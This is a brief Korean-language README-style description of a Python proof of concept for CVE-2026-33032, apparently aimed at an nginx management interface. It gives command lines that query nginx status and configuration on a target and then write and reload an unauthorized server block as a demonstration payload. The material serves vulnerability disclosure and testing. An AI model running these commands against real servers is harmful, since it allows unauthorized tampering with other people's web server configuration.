
CVE-2026-33032에 대한 Python 개념 증명(PoC)으로, nginx 상태와 구성을 검사한 후 무단 구성 쓰기 및 리로드를 시연하여 악성 서버 블록을 배포합니다.
python3 main.py http://target:9000 --tool nginx_status
python3 main.py 10.0.0.50 --tool nginx_config_list
python3 main.py http://target:9000 \
--tool nginx_config_add \
--payload poc.conf \
--content 'server { listen 8443; return 200 "MCPwned\n"; }'